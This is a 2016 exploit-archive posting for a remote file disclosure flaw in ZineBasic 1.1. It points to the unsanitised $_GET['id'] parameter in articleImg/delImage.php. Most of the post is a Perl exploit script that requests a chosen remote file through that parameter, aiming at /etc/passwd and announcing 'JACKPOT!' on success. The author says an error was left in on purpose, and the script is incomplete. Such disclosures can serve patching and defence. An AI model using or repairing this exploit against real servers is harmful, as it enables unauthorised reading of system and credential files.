ZineBasic 1.1 Remote File Disclosure
Posted on 20 September 2016
# Title: ZineBasic 1.1 Remote File Disclosure Exploit # Author: bd0rk || East Germany former GDR # Tested on: Ubuntu-Linux # Vendor: http://w2scripts.com/news-publishing/ # Download: http://downloads.sourceforge.net/project/zinebasic/zinebasic/v1.1/zinebasic_v1.1_00182.zip?r=https%3A%2F%2Fsourceforge.net%2Fprojects%2Fzinebasic%2F&ts=1474313108&use_mirror=master # Twitter: twitter.com/bd0rk #Greetings: zone-h.org, Curesec GmbH, SiteL GmbH, i:TECS GmbH, rgod, GoLd_M ---------------------------------------------------------------------------------- => Vulnerable sourcecode in /zinebasic_v1.1_00182/articleImg/delImage.php line 12 => Vulnerable snippet: $id = $_GET['id']; ---------------------------------------------------------------------------------- Exploitcode with little error inline 25-->'Gainst script-kiddies! || Copy&Paste: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #!/usr/bin/perl use LWP::Simple; use LWP::UserAgent; sub ex() { print "Usage: perl $0 someone.com /ZineBasic_Dir/ "; print " ZineBasic 1.1 Remote File Disclosure Exploit "; print " Contact: twitter.com/bd0rk "; ($host, $path, $under, $file,) = @ARGV; $under="/articleImg/"; $file="delImage.php?id=[REMOTE_FILE]"; my $target = "http://".$host.$path.$under.$file; my $usrAgent = LWP::UserAgent->new(); my $request = $usrAgent->get($target,":content_file"=>"[REMOTE_FILE]"); if ($request->is_success) { print "$target <= JACKPOT! "; print "etc/passwd "; exit(); } else { print "Exploit $target FAILED! [!].$request->status_line. "; exit(); }
